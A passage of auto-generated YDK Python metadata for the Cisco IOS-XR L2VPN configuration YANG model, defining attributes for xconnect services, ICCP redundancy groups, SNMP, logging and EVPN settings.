_MetaInfoClassMember('vlan-unaware-fxc-pseudowire-evpns', REFERENCE_CLASS, 'VlanUnawareFxcPseudowireEvpns' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns',
[], [],
''' List of EVPN Services
''',
'vlan_unaware_fxc_pseudowire_evpns',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vlan-unaware-flexible-xconnect-service',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices',
False,
[
_MetaInfoClassMember('vlan-unaware-flexible-xconnect-service', REFERENCE_LIST, 'VlanUnawareFlexibleXconnectService' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService',
[], [],
''' Flexible XConnect Service
''',
'vlan_unaware_flexible_xconnect_service',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vlan-unaware-flexible-xconnect-services',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.FlexibleXconnectServiceTable' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.FlexibleXconnectServiceTable',
False,
[
_MetaInfoClassMember('vlan-unaware-flexible-xconnect-services', REFERENCE_CLASS, 'VlanUnawareFlexibleXconnectServices' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices',
[], [],
''' List of Vlan-Unaware Flexible XConnect
Services
''',
'vlan_unaware_flexible_xconnect_services',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'flexible-xconnect-service-table',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces.IccpInterface' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces.IccpInterface',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Interface name
''',
'interface_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('mac-flush-tcn', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable STP-TCN MAC flushing
''',
'mac_flush_tcn',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('primary-vlan-range', ATTRIBUTE, 'str' , None, None,
[], [],
''' Primary VLAN range, in the form of 1-3,5
,8-11
''',
'primary_vlan_range',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('recovery-delay', ATTRIBUTE, 'int' , None, None,
[('30', '3600')], [],
''' Failure clear recovery delay
''',
'recovery_delay',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('secondary-vlan-range', ATTRIBUTE, 'str' , None, None,
[], [],
''' Secondary VLAN range, in the form of 1-3,5
,8-11
''',
'secondary_vlan_range',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'iccp-interface',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces',
False,
[
_MetaInfoClassMember('iccp-interface', REFERENCE_LIST, 'IccpInterface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces.IccpInterface',
[], [],
''' Interface name
''',
'iccp_interface',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'iccp-interfaces',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup',
False,
[
_MetaInfoClassMember('group-id', ATTRIBUTE, 'int' , None, None,
[('-2147483648', '2147483647')], [],
''' Group ID
''',
'group_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('iccp-interfaces', REFERENCE_CLASS, 'IccpInterfaces' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces',
[], [],
''' List of interfaces
''',
'iccp_interfaces',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('multi-homing-node-id', ATTRIBUTE, 'int' , None, None,
[('0', '254')], [],
''' ICCP-based service multi-homing node ID
''',
'multi_homing_node_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'iccp-redundancy-group',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.Redundancy.IccpRedundancyGroups' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.Redundancy.IccpRedundancyGroups',
False,
[
_MetaInfoClassMember('iccp-redundancy-group', REFERENCE_LIST, 'IccpRedundancyGroup' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup',
[], [],
''' ICCP Redundancy group
''',
'iccp_redundancy_group',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'iccp-redundancy-groups',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.Redundancy' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.Redundancy',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable redundancy groups
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('iccp-redundancy-groups', REFERENCE_CLASS, 'IccpRedundancyGroups' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.Redundancy.IccpRedundancyGroups',
[], [],
''' List of Inter-Chassis Communication Protocol
redundancy groups
''',
'iccp_redundancy_groups',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'redundancy',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database',
False,
[
_MetaInfoClassMember('bridge-domain-groups', REFERENCE_CLASS, 'BridgeDomainGroups' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups',
[], [],
''' List of bridge groups
''',
'bridge_domain_groups',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('flexible-xconnect-service-table', REFERENCE_CLASS, 'FlexibleXconnectServiceTable' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.FlexibleXconnectServiceTable',
[], [],
''' List of Flexible XConnect Services
''',
'flexible_xconnect_service_table',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('g8032-rings', REFERENCE_CLASS, 'G8032Rings' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings',
[], [],
''' List of G8032 Ring
''',
'g8032_rings',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-classes', REFERENCE_CLASS, 'PseudowireClasses' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses',
[], [],
''' List of pseudowire classes
''',
'pseudowire_classes',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('redundancy', REFERENCE_CLASS, 'Redundancy' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.Redundancy',
[], [],
''' Redundancy groups
''',
'redundancy',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('xconnect-groups', REFERENCE_CLASS, 'XconnectGroups' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups',
[], [],
''' List of xconnect groups
''',
'xconnect_groups',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'database',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Pbb' : {
'meta_info' : _MetaInfoClass('L2Vpn.Pbb',
False,
[
_MetaInfoClassMember('backbone-source-mac', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Backbone Source MAC
''',
'backbone_source_mac',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.AutoDiscovery.BgpSignaling' : {
'meta_info' : _MetaInfoClass('L2Vpn.AutoDiscovery.BgpSignaling',
False,
[
_MetaInfoClassMember('mtu-mismatch-ignore', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Ignore MTU mismatch for auto-discovered
pseudowires
''',
'mtu_mismatch_ignore',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bgp-signaling',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.AutoDiscovery' : {
'meta_info' : _MetaInfoClass('L2Vpn.AutoDiscovery',
False,
[
_MetaInfoClassMember('bgp-signaling', REFERENCE_CLASS, 'BgpSignaling' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.AutoDiscovery.BgpSignaling',
[], [],
''' Global bgp signaling attributes
''',
'bgp_signaling',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'auto-discovery',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Utility.Logging' : {
'meta_info' : _MetaInfoClass('L2Vpn.Utility.Logging',
False,
[
_MetaInfoClassMember('bridge-domain-state-change', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Bridge Domain state change logging
''',
'bridge_domain_state_change',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('nsr-state-change', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Non Stop Routing state change logging
''',
'nsr_state_change',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-state-change', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable pseudowire state change logging
''',
'pseudowire_state_change',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pwhe-replication-state-change', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable PW-HE Replication state change logging
''',
'pwhe_replication_state_change',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable VFI state change logging
''',
'vfi',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'logging',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Utility' : {
'meta_info' : _MetaInfoClass('L2Vpn.Utility',
False,
[
_MetaInfoClassMember('logging', REFERENCE_CLASS, 'Logging' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Utility.Logging',
[], [],
''' L2VPN logging utility
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'utility',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Snmp.Mib.MibInterface.Format' : {
'meta_info' : _MetaInfoClass('L2Vpn.Snmp.Mib.MibInterface.Format',
False,
[
_MetaInfoClassMember('external-interface-format', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Set MIB interface name output in slash
format (/)
''',
'external_interface_format',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'format',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Snmp.Mib.MibInterface' : {
'meta_info' : _MetaInfoClass('L2Vpn.Snmp.Mib.MibInterface',
False,
[
_MetaInfoClassMember('format', REFERENCE_CLASS, 'Format' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Snmp.Mib.MibInterface.Format',
[], [],
''' MIB interface name output format
''',
'format',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mib-interface',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Snmp.Mib.MibPseudowire' : {
'meta_info' : _MetaInfoClass('L2Vpn.Snmp.Mib.MibPseudowire',
False,
[
_MetaInfoClassMember('statistics', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable pseudowire statistics in MIB output
''',
'statistics',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mib-pseudowire',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Snmp.Mib' : {
'meta_info' : _MetaInfoClass('L2Vpn.Snmp.Mib',
False,
[
_MetaInfoClassMember('mib-interface', REFERENCE_CLASS, 'MibInterface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Snmp.Mib.MibInterface',
[], [],
''' Interface related configuration for MIB
''',
'mib_interface',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mib-pseudowire', REFERENCE_CLASS, 'MibPseudowire' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Snmp.Mib.MibPseudowire',
[], [],
''' Pseudowire related configuration for MIB
''',
'mib_pseudowire',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mib',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Snmp' : {
'meta_info' : _MetaInfoClass('L2Vpn.Snmp',
False,
[
_MetaInfoClassMember('mib', REFERENCE_CLASS, 'Mib' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Snmp.Mib',
[], [],
''' MIB related configuration
''',
'mib',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'snmp',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn' : {
'meta_info' : _MetaInfoClass('L2Vpn',
False,
[
_MetaInfoClassMember('auto-discovery', REFERENCE_CLASS, 'AutoDiscovery' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.AutoDiscovery',
[], [],
''' Global auto-discovery attributes
''',
'auto_discovery',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('capability', REFERENCE_ENUM_CLASS, 'L2VpnCapabilityModeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnCapabilityModeEnum',
[], [],
''' L2VPN Capability Mode
''',
'capability',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('database', REFERENCE_CLASS, 'Database' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database',
[], [],
''' L2VPN databases
''',
'database',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable L2VPN feature
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2vpn-router-id', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Global L2VPN Router ID
''',
'l2vpn_router_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('load-balance', REFERENCE_ENUM_CLASS, 'LoadBalanceEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'LoadBalanceEnum',
[], [],
''' Enable flow load balancing on l2vpn bridges
''',
'load_balance',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mspw-description', ATTRIBUTE, 'str' , None, None,
[(0, 64)], [],
''' MS-PW global description
''',
'mspw_description',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mtu-mismatch-ignore', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Ignore MTU Mismatch for XCs
''',
'mtu_mismatch_ignore',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('neighbor', REFERENCE_CLASS, 'Neighbor' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Neighbor',
[], [],
''' L2VPN neighbor submode
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('nsr', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Non-Stop Routing
''',
'nsr',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb', REFERENCE_CLASS, 'Pbb' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Pbb',
[], [],
''' L2VPN PBB Global
''',
'pbb',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pw-grouping', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable PW grouping
''',
'pw_grouping',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pw-routing', REFERENCE_CLASS, 'PwRouting' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.PwRouting',
[], [],
''' Pseudowire-routing attributes
''',
'pw_routing',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pw-status-disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable PW status
''',
'pw_status_disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pwoam-refresh', ATTRIBUTE, 'int' , None, None,
[('1', '4095')], [],
''' Configure PW OAM refresh interval
''',
'pwoam_refresh',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('snmp', REFERENCE_CLASS, 'Snmp' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Snmp',
[], [],
''' SNMP related configuration
''',
'snmp',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('tcn-propagation', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Topology change notification propagation
''',
'tcn_propagation',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('utility', REFERENCE_CLASS, 'Utility' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Utility',
[], [],
''' L2VPN utilities
''',
'utility',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2vpn',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'GenericInterfaceLists.GenericInterface.Interfaces.Interface' : {
'meta_info' : _MetaInfoClass('GenericInterfaceLists.GenericInterface.Interfaces.Interface',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Name of the interface
''',
'interface_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable interface
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'GenericInterfaceLists.GenericInterface.Interfaces' : {
'meta_info' : _MetaInfoClass('GenericInterfaceLists.GenericInterface.Interfaces',
False,
[
_MetaInfoClassMember('interface', REFERENCE_LIST, 'Interface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'GenericInterfaceLists.GenericInterface.Interfaces.Interface',
[], [],
''' Interface
''',
'interface',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interfaces',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'GenericInterfaceLists.GenericInterface' : {
'meta_info' : _MetaInfoClass('GenericInterfaceLists.GenericInterface',
False,
[
_MetaInfoClassMember('generic-interface-list-name', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the interface list
''',
'generic_interface_list_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable interface list
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interfaces', REFERENCE_CLASS, 'Interfaces' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'GenericInterfaceLists.GenericInterface.Interfaces',
[], [],
''' Interface table
''',
'interfaces',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'generic-interface',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'GenericInterfaceLists' : {
'meta_info' : _MetaInfoClass('GenericInterfaceLists',
False,
[
_MetaInfoClassMember('generic-interface', REFERENCE_LIST, 'GenericInterface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'GenericInterfaceLists.GenericInterface',
[], [],
''' Bridge group
''',
'generic_interface',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'generic-interface-lists',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnTimers' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnTimers',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable EVPN timers
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-peering', ATTRIBUTE, 'int' , None, None,
[('0', '300')], [],
''' Global Peering timer
''',
'evpn_peering',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-recovery', ATTRIBUTE, 'int' , None, None,
[('20', '3600')], [],
''' Global Recovery timer
''',
'evpn_recovery',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-timers',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi.EviLoadBalancing' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi.EviLoadBalancing',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable EVI Loadbalancing
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evi-flow-label', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Flow Label based load balancing
''',
'evi_flow_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evi-load-balancing',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.TwoByteAsOrFourByteAs' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.TwoByteAsOrFourByteAs',
False,
[
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Two byte or 4 byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'two-byte-as-or-four-byte-as',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.Ipv4Address' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.Ipv4Address',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
